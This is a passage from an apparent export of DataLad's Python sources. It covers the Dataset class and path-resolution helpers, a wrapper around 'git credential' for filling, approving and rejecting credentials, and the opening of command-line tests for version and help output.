4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Implements class Dataset\n\"\"\"\n\nimport inspect\nimport logging\nfrom functools import wraps\nfrom os.path import (\n curdir,\n exists,\n join as opj,\n normpath,\n pardir,\n)\nfrom weakref import WeakValueDictionary\n\nfrom datalad import cfg\nfrom datalad.config import ConfigManager\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import Constraint\n# DueCredit\nfrom datalad.support.due import due\nfrom datalad.support.due_utils import duecredit_dataset\nfrom datalad.support.exceptions import (\n NoDatasetFound,\n)\nfrom datalad.dataset.repo import (\n path_based_str_repr,\n PathBasedFlyweight,\n)\nfrom datalad.support.gitrepo import (\n GitRepo,\n)\nfrom datalad.support import path as op\n\nimport datalad.utils as ut\nfrom datalad.utils import (\n getpwd,\n optional_args,\n get_dataset_root,\n get_sig_param_names,\n # TODO remove after a while, when external consumers have adjusted\n # to use get_dataset_root()\n get_dataset_root as rev_get_dataset_root,\n Path,\n PurePath,\n ensure_list,\n)\n\n\nlgr = logging.getLogger('datalad.dataset')\nlgr.log(5, \"Importing 
dataset\")\n\n\n@path_based_str_repr\nclass Dataset(object, metaclass=PathBasedFlyweight):\n \"\"\"Representation of a DataLad dataset/repository\n\n This is the core data type of DataLad: a representation of a dataset.\n At its core, datasets are (git-annex enabled) Git repositories. This\n class provides all operations that can be performed on a dataset.\n\n Creating a dataset instance is cheap, all actual operations are\n delayed until they are actually needed. Creating multiple `Dataset`\n class instances for the same Dataset location will automatically\n yield references to the same object.\n\n A dataset instance comprises of two major components: a `repo`\n attribute, and a `config` attribute. The former offers access to\n low-level functionality of the Git or git-annex repository. The\n latter gives access to a dataset's configuration manager.\n\n Most functionality is available via methods of this class, but also\n as stand-alone functions with the same name in `datalad.api`.\n \"\"\"\n # Begin Flyweight\n _unique_instances = WeakValueDictionary()\n\n @classmethod\n def _flyweight_preproc_path(cls, path):\n \"\"\"Custom handling for few special abbreviations for datasets\"\"\"\n path_ = path\n if path in ('^', '^.'):\n dsroot = get_dataset_root(curdir)\n if dsroot is None:\n raise NoDatasetFound('No dataset contains path: {}'.format(\n str(Path.cwd())))\n if path == '^':\n # get the topmost dataset from current location. Note that 'zsh'\n # might have its ideas on what to do with ^, so better use as -d^\n path_ = Dataset(dsroot).get_superdataset(\n topmost=True).path\n elif path == '^.':\n # the dataset containing current directory\n path_ = dsroot\n elif path == '///':\n # TODO: logic/UI on installing a default dataset could move here\n # from search?\n path_ = cfg.obtain('datalad.locations.default-dataset')\n if path != path_:\n lgr.debug(\"Resolved dataset alias %r to path %r\", path, path_)\n return path_\n\n @classmethod\n def _flyweight_postproc_path(cls, path):\n # we want an absolute path, but no resolved symlinks\n if not op.isabs(path):\n path = op.join(op.getpwd(), path)\n\n # use canonical paths only:\n return op.normpath(path)\n\n def _flyweight_invalid(self):\n \"\"\"Invalidation of Flyweight instance\n\n Dataset doesn't need to be invalidated during its lifetime at all. Instead the underlying *Repo instances are.\n Dataset itself can represent a not yet existing path.\n \"\"\"\n return False\n # End Flyweight\n\n def __hash__(self):\n # the flyweight key is already determining unique instances\n # add the class name to distinguish from strings of a path\n return hash((self.__class__.__name__, self.__weakref__.key))\n\n def __init__(self, path):\n \"\"\"\n Parameters\n ----------\n path : str or Path\n Path to the dataset location. 
This location may or may not exist\n yet.\n \"\"\"\n self._pathobj = path if isinstance(path, ut.Path) else None\n if isinstance(path, ut.PurePath):\n path = str(path)\n self._path = path\n self._repo = None\n self._id = None\n self._cfg = None\n self._cfg_bound = None\n\n @property\n def pathobj(self):\n \"\"\"pathobj for the dataset\"\"\"\n # XXX this relies on the assumption that self._path as managed\n # by the base class is always a native path\n if not self._pathobj:\n self._pathobj = ut.Path(self._path)\n return self._pathobj\n\n def __eq__(self, other):\n if not hasattr(other, 'pathobj'):\n return False\n # Ben: https://github.com/datalad/datalad/pull/4057#discussion_r370153586\n # It's pointing to the same thing, while not being the same object\n # (in opposition to the *Repo classes). So `ds1 == ds2`,\n # `but ds1 is not ds2.` I thought that's a useful distinction. On the\n # other hand, I don't think we use it anywhere outside tests yet.\n me_exists = self.pathobj.exists()\n other_exists = other.pathobj.exists()\n if me_exists != other_exists:\n # no chance this could be the same\n return False\n elif me_exists:\n # check on filesystem\n return self.pathobj.samefile(other.pathobj)\n else:\n # we can only do lexical comparison.\n # this will fail to compare a long and a shortpath.\n # on windows that could actually point to the same thing\n # if it would exists, but this is how far we go with this.\n return self.pathobj == other.pathobj\n\n def __getattr__(self, attr):\n # Assure that we are not just missing some late binding @datasetmethod .\n if not attr.startswith('_'): # do not even consider those\n lgr.debug(\"Importing datalad.api to possibly discover possibly not yet bound method %r\", attr)\n # load entire datalad.api which will also bind datasetmethods\n # from extensions.\n import datalad.api\n # which would bind all known interfaces as well.\n # Although adds overhead, good for UX\n return super(Dataset, self).__getattribute__(attr)\n\n def close(self):\n \"\"\"Perform operations which would close any possible process using this Dataset\n \"\"\"\n repo = self._repo\n self._repo = None\n if repo:\n # might take care about lingering batched processes etc\n del repo\n\n @property\n def path(self):\n \"\"\"path to the dataset\"\"\"\n return self._path\n\n @property\n def repo(self):\n \"\"\"Get an instance of the version control system/repo for this dataset,\n or None if there is none yet (or none anymore).\n\n If testing the validity of an instance of GitRepo is guaranteed to be\n really cheap this could also serve as a test whether a repo is present.\n\n Note, that this property is evaluated every time it is used. If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n GitRepo or AnnexRepo\n \"\"\"\n\n # If we already got a *Repo instance, check whether it's still valid;\n # Note, that this basically does part of the testing that would\n # (implicitly) be done in the loop below again. So, there's still\n # potential to speed up when we actually need to get a new instance\n # (or none). But it's still faster for the vast majority of cases.\n #\n # TODO: Dig deeper into it and melt with new instance guessing. 
This\n # should also involve to reduce redundancy of testing such things from\n # within Flyweight.__call__, AnnexRepo.__init__ and GitRepo.__init__!\n #\n # Also note, that this could be forged into a single big condition, but\n # that is hard to read and we should be well aware of the actual\n # criteria here:\n if self._repo is not None and self.pathobj.resolve() == self._repo.pathobj:\n # we got a repo and path references still match\n if isinstance(self._repo, AnnexRepo):\n # it's supposed to be an annex\n # Here we do the same validation that Flyweight would do beforehand if there was a call to AnnexRepo()\n if self._repo is AnnexRepo._unique_instances.get(\n self._repo.path, None) and not self._repo._flyweight_invalid():\n # it's still the object registered as flyweight and it's a\n # valid annex repo\n return self._repo\n elif isinstance(self._repo, GitRepo):\n # it's supposed to be a plain git\n # same kind of checks as for AnnexRepo above, but additionally check whether it was changed to have an\n # annex now.\n # TODO: Instead of is_with_annex, we might want the cheaper check for an actually initialized annex.\n # However, that's not completely clear. On the one hand, if it really changed to be an annex\n # it seems likely that this happened locally and it would also be an initialized annex. On the\n # other hand, we could have added (and fetched) a remote with an annex, which would turn it into\n # our current notion of an uninitialized annex. Question is whether or not such a change really\n # need to be detected. For now stay on the safe side and detect it.\n if self._repo is GitRepo._unique_instances.get(\n self._repo.path, None) and not self._repo._flyweight_invalid() and not \\\n self._repo.is_with_annex():\n # it's still the object registered as flyweight, it's a\n # valid git repo and it hasn't turned into an annex\n return self._repo\n\n # Note: Although it looks like the \"self._repo = None\" assignments\n # could be used instead of variable \"valid\", that's a big difference!\n # The *Repo instances are flyweights, not singletons. self._repo might\n # be the last reference, which would lead to those objects being\n # destroyed and therefore the constructor call would result in an\n # actually new instance. This is unnecessarily costly.\n try:\n self._repo = repo_from_path(self._path)\n except ValueError:\n lgr.log(5, \"Failed to detect a valid repo at %s\", self.path)\n self._repo = None\n return\n\n if due.active:\n # TODO: Figure out, when exactly this is needed. Don't think it\n # makes sense to do this for every dataset,\n # no matter what => we want .repo to be as cheap as it gets.\n # Makes sense only on installed dataset - @never_fail'ed\n duecredit_dataset(self)\n\n return self._repo\n\n @property\n def id(self):\n \"\"\"Identifier of the dataset.\n\n This identifier is supposed to be unique across datasets, but identical\n for different versions of the same dataset (that have all been derived\n from the same original dataset repository).\n\n Note, that a plain git/git-annex repository doesn't necessarily have\n a dataset id yet. It is created by `Dataset.create()` and stored in\n .datalad/config. If None is returned while there is a valid repository,\n there may have never been a call to `create` in this branch before\n current commit.\n\n Note, that this property is evaluated every time it is used. 
If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n str\n This is either a stored UUID, or `None`.\n \"\"\"\n\n return self.config.get('datalad.dataset.id', None)\n\n @property\n def config(self):\n \"\"\"Get a ``ConfigManager`` instance for a dataset's configuration\n\n In case a dataset does not (yet) have an existing corresponding\n repository, the returned ``ConfigManager`` is the global instance\n that is also provided via ``datalad.cfg``.\n\n Note, that this property is evaluated every time it is used. If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n ConfigManager\n \"\"\"\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n repo = self.repo\n if repo is None:\n # if there's no repo (yet or anymore), we can't read/write config at\n # dataset level, but only at user/system level\n # However, if this was the case before as well, we don't want a new\n # instance of ConfigManager, but use the global one\n if self._cfg_bound in (True, None):\n # for the sake of uniformity assign datalad.cfg to self._cfg\n self._cfg = cfg\n self._cfg_bound = False\n\n else:\n self._cfg = repo.config\n self._cfg_bound = True\n\n return self._cfg\n\n def recall_state(self, whereto):\n \"\"\"Something that can be used to checkout a particular state\n (tag, commit) to \"undo\" a change or switch to a otherwise desired\n previous state.\n\n Parameters\n ----------\n whereto: str\n \"\"\"\n if not self.is_installed():\n raise RuntimeError(\n \"cannot remember a state when a dataset is not yet installed\")\n self.repo.checkout(whereto)\n\n def is_installed(self):\n \"\"\"Returns whether a dataset is installed.\n\n A dataset is installed when a repository for it exists on the filesystem.\n\n Returns\n -------\n bool\n \"\"\"\n\n return self.path is not None and exists(self.path) and \\\n self.repo is not None\n\n def get_superdataset(self, datalad_only=False, topmost=False,\n registered_only=True):\n \"\"\"Get the dataset's superdataset\n\n Parameters\n ----------\n datalad_only : bool, optional\n Whether to consider only \"datalad datasets\" (with non-None\n id), or (if False, which is default) - any git repository\n topmost : bool, optional\n Return the topmost super-dataset. Might then be the current one.\n registered_only : bool, optional\n Test whether any discovered superdataset actually contains the\n dataset in question as a registered subdataset (as opposed to\n just being located in a subdirectory without a formal relationship).\n\n Returns\n -------\n Dataset or None\n \"\"\"\n path = self.path\n sds_path = path if topmost else None\n\n def res_filter(res):\n return res.get('status') == 'ok' and res.get('type') == 'dataset'\n\n def subds_contains_path(ds, path):\n return path in sds.subdatasets(recursive=False,\n contains=path,\n result_filter=res_filter,\n on_failure='ignore',\n result_xfm='paths',\n result_renderer='disabled')\n\n while path:\n # normalize the path after adding .. 
so we guaranteed to not\n # follow into original directory if path itself is a symlink\n par_path = normpath(opj(path, pardir))\n sds_path_ = get_dataset_root(par_path)\n if sds_path_ is None:\n # no more parents, use previous found\n break\n\n sds = Dataset(sds_path_)\n if datalad_only:\n # test if current git is actually a dataset?\n if not sds.id:\n break\n if registered_only:\n if not subds_contains_path(sds, path):\n break\n\n # That was a good candidate\n sds_path = sds_path_\n path = par_path\n if not topmost:\n # no looping\n break\n\n if sds_path is None:\n # None was found\n return None\n\n # No postprocessing now should be necessary since get_toppath\n # tries its best to not resolve symlinks now\n\n return Dataset(sds_path)\n\n\n@optional_args\ndef datasetmethod(f, name=None, dataset_argname='dataset'):\n \"\"\"Decorator to bind functions to Dataset class.\n\n The decorated function is still directly callable and additionally serves\n as method `name` of class Dataset. To achieve this, the first positional\n argument is redirected to original keyword argument 'dataset_argname'. All\n other arguments stay in order (and keep their names, of course). That\n means, that the signature of the bound function is name(self, a, b) if the\n original signature is name(a, dataset, b) for example.\n\n The decorator has no effect on the actual function decorated with it.\n \"\"\"\n\n if not name:\n name = f.__name__\n\n @wraps(f)\n def apply_func(instance, *args, **kwargs):\n # Wrapper function to assign arguments of the bound function to\n # original function.\n #\n # Note\n # ----\n # This wrapper is NOT returned by the decorator, but only used to bind\n # the function `f` to the Dataset class.\n kwargs = kwargs.copy()\n\n # due to use of functools.wraps and inability of of getarspec to get\n # those, we use .signature.\n # More information in de-wrapt PR https://github.com/datalad/datalad/pull/6190\n from datalad.utils import get_sig_param_names\n f_args, f_kwonlyargs = get_sig_param_names(f, ('pos_any', 'kw_only'))\n\n # If bound function is used with wrong signature (especially by\n # explicitly passing a dataset), let's raise a proper exception instead\n # of a 'list index out of range', that is not very telling to the user.\n # In case whenever kwonlyargs are used, 'dataset' would not be listed\n # among args, so we would account for it (possibly) be there.\n if len(args) >= len(f_args) + int(bool(f_kwonlyargs)):\n non_dataset_args = [\"self\"] + [a for a in f_args if a != dataset_argname]\n raise TypeError(\n f\"{name}() takes at most {len(f_args)} arguments ({len(args)} given): \"\n f\"{non_dataset_args}\")\n if dataset_argname in kwargs:\n raise TypeError(\n f\"{name}() got an unexpected keyword argument {dataset_argname}\")\n kwargs[dataset_argname] = instance\n if dataset_argname in f_kwonlyargs:\n # * was used to enforce kwargs, so we just would pass things as is\n pass\n else:\n # so it is \"old\" style, where it is a regular kwargs - we pass everything\n # via kwargs\n # TODO: issue a DX oriented warning that we advise to separate out kwargs,\n # dataset included, with * from positional args?\n ds_index = f_args.index(dataset_argname)\n for i in range(0, len(args)):\n if i < ds_index:\n kwargs[f_args[i]] = args[i]\n elif i >= ds_index:\n kwargs[f_args[i+1]] = args[i]\n args = []\n return f(*args, **kwargs)\n\n setattr(Dataset, name, apply_func)\n # set the ad-hoc attribute so that @build_doc could also bind built doc\n # to the dataset method\n if getattr(f, '_dataset_method', 
None):\n raise RuntimeError(f\"_dataset_method of {f} is already set to {f._dataset_method}\")\n setattr(f, '_dataset_method', apply_func)\n return f\n\n\n# Note: Cannot be defined within constraints.py, since then dataset.py needs to\n# be imported from constraints.py, which needs to be imported from dataset.py\n# for another constraint\nclass EnsureDataset(Constraint):\n \"\"\"Despite its name, this constraint does not actually ensure that the\n argument is a valid dataset, because for procedural reasons this would\n typically duplicate subsequent checks and processing. However, it can\n be used to achieve uniform documentation of `dataset` arguments.\"\"\"\n\n def __call__(self, value):\n if isinstance(value, Dataset):\n return value\n elif isinstance(value, (str, PurePath)):\n # we cannot convert to a Dataset class right here\n # - duplicates require_dataset() later on\n # - we need to be able to distinguish between a bound\n # dataset method call and a standalone call for\n # relative path argument disambiguation\n #return Dataset(path=value)\n return value\n else:\n raise ValueError(\"Can't create Dataset from %s.\" % type(value))\n\n def short_description(self):\n return \"Dataset\"\n\n def long_description(self):\n return \"\"\"Value must be a Dataset or a valid identifier of a Dataset\n (e.g. a path)\"\"\"\n\n\ndef require_dataset(dataset, check_installed=True, purpose=None):\n \"\"\"Helper function to resolve a dataset.\n\n This function tries to resolve a dataset given an input argument,\n or based on the process' working directory, if `None` is given.\n\n Parameters\n ----------\n dataset : None or path or Dataset\n Some value identifying a dataset or `None`. In the latter case\n a dataset will be searched based on the process working directory.\n check_installed : bool, optional\n If True, an optional check whether the resolved dataset is\n properly installed will be performed.\n purpose : str, optional\n This string will be inserted in error messages to make them more\n informative. The pattern is \"... dataset for <STRING>\".\n\n Returns\n -------\n Dataset\n If a dataset could be determined.\n\n Raises\n ------\n NoDatasetFound\n If not dataset could be determined.\n \"\"\"\n if dataset is not None and not isinstance(dataset, Dataset):\n dataset = Dataset(dataset)\n\n if dataset is None: # possible scenario of cmdline calls\n dspath = get_dataset_root(getpwd())\n if not dspath:\n raise NoDatasetFound(\n \"No dataset found at '{}'{}. Specify a dataset to work with \"\n \"by providing its path via the `dataset` option, \"\n \"or change the current working directory to be in a \"\n \"dataset.\".format(\n getpwd(),\n \" for the purpose {!r}\".format(purpose) if purpose else ''\n )\n )\n dataset = Dataset(dspath)\n\n assert(dataset is not None)\n lgr.debug(u\"Resolved dataset%s: %s\",\n u' to {}'.format(purpose) if purpose else '',\n dataset.path)\n\n if check_installed and not dataset.is_installed():\n raise NoDatasetFound(\n f\"No installed dataset found at {dataset.path}\")\n\n return dataset\n\n\n# New helpers, courtesy of datalad-revolution.\n\n\n# note: not thread safe if threads chdir - uses getpwd\ndef resolve_path(path, ds=None, ds_resolved=None):\n \"\"\"Resolve a path specification (against a Dataset location)\n\n Any path is returned as an absolute path. If, and only if, a dataset\n object instance is given as `ds`, relative paths are interpreted as\n relative to the given dataset. 
In all other cases, relative paths are\n treated as relative to the current working directory.\n\n Note however, that this function is not able to resolve arbitrarily\n obfuscated path specifications. All operations are purely lexical, and no\n actual path resolution against the filesystem content is performed.\n Consequently, common relative path arguments like '../something' (relative\n to PWD) can be handled properly, but things like 'down/../under' cannot, as\n resolving this path properly depends on the actual target of any\n (potential) symlink leading up to '..'.\n\n Parameters\n ----------\n path : str or PathLike or list\n Platform-specific path specific path specification. Multiple path\n specifications can be given as a list\n ds : Dataset or PathLike or None\n Dataset instance to resolve relative paths against.\n ds_resolved : Dataset or None\n A dataset instance that was created from `ds` outside can be provided\n to avoid multiple instantiation on repeated calls.\n\n Returns\n -------\n `pathlib.Path` object or list(Path)\n When a list was given as input a list is returned, a Path instance\n otherwise.\n \"\"\"\n got_ds_instance = isinstance(ds, Dataset)\n if ds is not None and not got_ds_instance:\n ds = ds_resolved or require_dataset(\n ds, check_installed=False, purpose='path resolution')\n out = []\n pwd_parts = None # get it upon first use but only once\n for p in ensure_list(path):\n if ds is None or not got_ds_instance:\n # no dataset at all or no instance provided -> CWD is always the reference\n # nothing needs to be done here. Path-conversion and absolutification\n # are done next\n pass\n # we have a given datasets instance\n elif not Path(p).is_absolute():\n # we have a dataset and no abspath nor an explicit relative path ->\n # resolve it against the dataset\n p = ds.pathobj / p\n\n p = ut.Path(p)\n\n # make sure we return an absolute path, but without actually\n # resolving anything\n if not p.is_absolute():\n # in general it is almost impossible to use resolve() when\n # we can have symlinks in the root path of a dataset\n # (that we don't want to resolve here), symlinks to annex'ed\n # files (that we never want to resolve), and other within-repo\n # symlinks that we (sometimes) want to resolve (i.e. symlinked\n # paths for addressing content vs adding content)\n # CONCEPT: do the minimal thing to catch most real-world inputs\n # ASSUMPTION: the only sane relative path input that needs\n # handling and can be handled are upward references like\n # '../../some/that', whereas stuff like 'down/../someotherdown'\n # are intellectual exercises\n # ALGORITHM: match any number of leading '..' 
path components\n # and shorten the PWD by that number\n # NOT using ut.Path.cwd(), because it has symlinks resolved!!\n if not pwd_parts:\n pwd_parts = ut.Path(getpwd()).parts\n path_parts = p.parts\n leading_parents = 0\n for pp in p.parts:\n if pp == op.pardir:\n leading_parents += 1\n path_parts = path_parts[1:]\n elif pp == op.curdir:\n # we want to discard that, but without stripping\n # a corresponding parent\n path_parts = path_parts[1:]\n else:\n break\n p = ut.Path(\n op.join(\n *(pwd_parts[:-leading_parents if leading_parents else None]\n + path_parts)))\n # note that we will not \"normpath()\" the result, check the\n # pathlib docs for why this is the only sane choice in the\n # face of the possibility of symlinks in the path\n out.append(p)\n return out[0] if isinstance(path, (str, PurePath)) else out\n\n# TODO keep this around for a while so that extensions can be updated\nrev_resolve_path = resolve_path\n\n\ndef path_under_rev_dataset(ds, path):\n ds_path = ds.pathobj\n try:\n rpath = str(ut.Path(path).relative_to(ds_path))\n if not rpath.startswith(op.pardir):\n # path is already underneath the dataset\n return path\n except Exception:\n # whatever went wrong, we gotta play save\n pass\n\n root = get_dataset_root(str(path))\n while root is not None and not ds_path.samefile(root):\n # path and therefore root could be relative paths,\n # hence in the next round we cannot use dirname()\n # to jump in the the next directory up, but we have\n # to use ./.. and get_dataset_root() will handle\n # the rest just fine\n root = get_dataset_root(op.join(root, op.pardir))\n if root is None:\n return None\n return ds_path / op.relpath(str(path), root)\n\n\nlgr.log(5, \"Done importing dataset\")\n" }, { "alpha_fraction": 0.5573372840881348, "alphanum_fraction": 0.5603207349777222, "avg_line_length": 33.36538314819336, "blob_id": "6e861d3d178554e87c63a2671c4fe43bc104baa7", "content_id": "6adba62cba51cf4340736828034ee9dcf2068038", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5371, "license_type": "permissive", "max_line_length": 87, "num_lines": 156, "path": "/datalad/local/gitcredential.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nfrom io import StringIO\n\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n)\n\nfrom logging import getLogger\nlgr = getLogger('datalad.local.gitcredentials')\n\n\ndef _credspec2dict(spec):\n \"\"\"Parser for git-credential input/output format\n\n See `man 1 git-credential` (INPUT/OUTPUT FORMAT)\n\n Parameters\n ----------\n spec : file-like or IO stream\n\n Returns\n -------\n dict\n \"\"\"\n attrs = {}\n for line in spec:\n if not line:\n # empty line ends specification\n break\n # protocol violations?\n assert('=' in line)\n assert(line[-1] == '\\n')\n k, v = line[:-1].split('=', maxsplit=1)\n # w/o conversion to str this might be a _io.TextWrapper crashing further\n # down the road (for example when passed to re.match):\n attrs[k] = str(v)\n return attrs\n\n\nclass 
GitCredentialInterface(object):\n \"\"\"Frontend to `git credential`\n \"\"\"\n\n def __init__(self, protocol=None, host=None, path=None, username=None,\n password=None, url=None, repo=None):\n \"\"\"\n protocol: str, optional\n The protocol over which the credential will be used (e.g., https).\n host: str, optional\n The remote hostname for a network credential. This includes the port\n number if one was specified (e.g., \"example.com:8088\").\n path: str, optional\n The path with which the credential will be used. E.g., for accessing\n a remote https repository, this will be the repository’s path on the\n server.\n username: str, optional\n The credential’s username, if we already have one (e.g., from a URL,\n the configuration, the user, or from a previously run helper).\n password: str, optional\n The credential’s password, if we are asking it to be stored.\n url: str, optional\n When this special attribute is read by git credential as 'url', the\n value is parsed as a URL and treated as if its constituent parts were\n read (e.g., url=https://example.com would behave as if\n protocol=https and host=example.com had been provided).\n This can help callers avoid parsing URLs themselves.\n\n Note that specifying a protocol is mandatory and if the URL doesn’t\n specify a hostname (e.g., \"cert:///path/to/file\") the credential will\n contain a hostname attribute whose value is an empty string.\n\n Components which are missing from the URL (e.g., there is no username\n in the example above) will be left unset.\n repo : GitRepo, optional\n Specify to process credentials in the context of a particular\n repository (e.g. to consider a repository-local credential helper\n configuration).\n \"\"\"\n self._runner = None\n self._repo = repo\n self._credential_props = {}\n for name, var in (('url', url),\n ('protocol', protocol),\n ('host', host),\n ('path', path),\n ('username', username),\n ('password', password)):\n if var is None:\n continue\n self._credential_props[name] = var\n\n def _get_runner(self):\n runner = self._runner or GitWitlessRunner(\n cwd=self._repo.path if self._repo else None)\n self._runner = runner\n return runner\n\n def _format_props(self):\n props = ''\n for p in self._credential_props:\n val = self._credential_props.get(p)\n if self._credential_props.get(p) is None:\n continue\n props += '{}={}\\n'.format(p, val)\n\n props = props.encode('utf-8')\n if not props:\n props = b'\\n'\n return props\n\n def __getitem__(self, key):\n return self._credential_props.__getitem__(key)\n\n def __contains__(self, key):\n return self._credential_props.__contains__(key)\n\n def __repr__(self):\n return repr(self._credential_props)\n\n def fill(self):\n # TODO we could prevent prompting by setting GIT_ASKPASS=true\n # unclear how to achieve the same on windows\n # would be better to use a special return value for no-prompt\n # with GIT_ASKPASS=true would just be an empty string\n out = self._get_runner().run(\n ['git', 'credential', 'fill'],\n protocol=StdOutErrCapture,\n stdin=self._format_props()\n )\n attrs = _credspec2dict(StringIO(out['stdout']))\n self._credential_props = attrs\n return self\n\n def approve(self):\n self._get_runner().run(\n ['git', 'credential', 'approve'],\n stdin=self._format_props()\n )\n\n def reject(self):\n self._get_runner().run(\n ['git', 'credential', 'reject'],\n stdin=self._format_props()\n )\n\n\n" }, { "alpha_fraction": 0.6000764966011047, "alphanum_fraction": 0.6036472320556641, "avg_line_length": 35.728336334228516, "blob_id": 
"e7c240a879fbafb8dca27bd301735175c6d7c7e8", "content_id": "18254166e3f7d5c9eb4586b517a680dd49c0e092", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15683, "license_type": "permissive", "max_line_length": 105, "num_lines": 427, "path": "/datalad/cli/tests/test_main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test functioning of the datalad main cmdline utility \"\"\"\n\nimport os\nimport re\nfrom io import StringIO\nfrom unittest.mock import patch\n\nimport pytest\n\nimport datalad\nfrom datalad import __version__\nfrom datalad.api import (\n Dataset,\n create,\n)\nfrom datalad.cmd import StdOutErrCapture\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.interface.base import get_interface_groups\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n eq_,\n in_,\n ok_,\n ok_startswith,\n on_windows,\n skip_if_no_module,\n slow,\n with_tempfile,\n)\nfrom datalad.ui.utils import (\n get_console_width,\n get_terminal_size,\n)\nfrom datalad.utils import chpwd\n\nfrom ..helpers import get_commands_from_groups\nfrom ..main import main\n\n\ndef run_main(args, exit_code=0, expect_stderr=False):\n \"\"\"Run main() of the datalad, do basic checks and provide outputs\n\n Parameters\n ----------\n args : list\n List of string cmdline arguments to pass\n exit_code : int\n Expected exit code. Would raise AssertionError if differs\n expect_stderr : bool or string\n Whether to expect stderr output. 
If string -- match\n\n Returns\n -------\n stdout, stderr strings\n Output produced\n \"\"\"\n was_mode = datalad.__api\n try:\n # we need to catch \"stdout\" from multiple places:\n # sys.stdout but also from the UI, which insists on holding\n # a dedicated handle\n fakeout = StringIO()\n fakeerr = StringIO()\n with patch('sys.stderr', new=fakeerr) as cmerr, \\\n patch('sys.stdout', new=fakeout) as cmout, \\\n patch.object(datalad.ui.ui._ui, 'out', new=fakeout):\n with assert_raises(SystemExit) as cm:\n main([\"datalad\"] + list(args))\n eq_('cmdline', datalad.get_apimode())\n assert_equal(cm.value.code, exit_code)\n stdout = cmout.getvalue()\n stderr = cmerr.getvalue()\n if expect_stderr is False:\n assert_equal(stderr, \"\")\n elif expect_stderr is True:\n # do nothing -- just return\n pass\n else:\n # must be a string\n assert_equal(stderr, expect_stderr)\n finally:\n # restore what we had\n datalad.__api = was_mode\n\n return stdout, stderr\n\n\ndef get_all_commands() -> list:\n return list(get_commands_from_groups(get_interface_groups()))\n\n\ndef assert_all_commands_present(out):\n \"\"\"Helper to reuse to assert that all known commands are present in output\n \"\"\"\n for cmd in get_all_commands():\n assert_re_in(fr\"\\b{cmd}\\b\", out, match=False)\n\n\n# TODO: switch to stdout for --version output\ndef test_version():\n # we just get a version if not asking for a version of some command\n stdout, stderr = run_main(['--version'], expect_stderr=True)\n eq_(stdout.rstrip(), \"datalad %s\" % datalad.__version__)\n\n stdout, stderr = run_main(['clone', '--version'], expect_stderr=True)\n ok_startswith(stdout, 'datalad %s\\n' % datalad.__version__)\n # since https://github.com/datalad/datalad/pull/2733 no license in --version\n assert_not_in(\"Copyright\", stdout)\n assert_not_in(\"Permission is hereby granted\", stdout)\n\n try:\n import datalad_container\n except ImportError:\n pass # not installed, cannot test with extension\n else:\n stdout, stderr = run_main(['containers-list', '--version'], expect_stderr=True)\n eq_(stdout, 'datalad_container %s\\n' % datalad_container.__version__)\n\n\ndef test_help_np():\n stdout, stderr = run_main(['--help-np'])\n\n # Let's extract section titles:\n # enough of bin/datalad and .tox/py27/bin/datalad -- guarantee consistency! ;)\n ok_startswith(stdout, 'Usage: datalad')\n # Sections start/end with * if ran under DATALAD_HELP2MAN mode\n sections = [l[1:-1] for l in filter(re.compile(r'^\\*.*\\*$').match, stdout.split('\\n'))]\n for s in {'Essential',\n 'Miscellaneous',\n 'General information',\n 'Global options',\n 'Plumbing',\n }:\n assert_in(s, sections)\n # should be present only one time!\n eq_(stdout.count(f'*{s}*'), 1)\n\n # check that we have global options actually listed after \"Global options\"\n # ATM -c is the first such option\n assert re.search(r\"Global options\\W*-c \", stdout, flags=re.MULTILINE)\n # and -c should be listed only once - i.e. 
